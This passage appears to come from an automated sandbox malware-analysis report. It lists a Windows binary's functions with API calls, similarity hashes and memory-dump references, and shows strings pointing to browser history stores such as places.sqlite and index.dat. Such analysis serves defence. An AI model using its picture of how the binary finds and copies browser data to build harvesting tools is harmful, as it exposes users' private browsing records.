                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022A0048), ref: 0044DF01
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022B0050), ref: 0044DF11
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00C86DA8), ref: 0044DF21
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022B0458), ref: 0044DF31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                  • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                  • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                  • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                  • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                  • String ID: $$8
                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                  Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                  • API String ID: 0-1445880494
                                                                                                                  • Opcode ID: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                                                                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                  • Opcode Fuzzy Hash: 7e9b6645e50301b73c799b582cda44e61fb49136c81ea503956771b4ac800c5f
                                                                                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76272EE0), ref: 0040E3EC
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1979745280-0
                                                                                                                  • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                  • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1355100292-0
                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                  • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                  • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839530781-0
                                                                                                                  • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                  • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID: *.*$index.dat
                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                  • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                  • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156039329-0
                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125800050-0
                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                  • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                  • String ID: }A
                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3056473165-0
                                                                                                                  • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                  • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
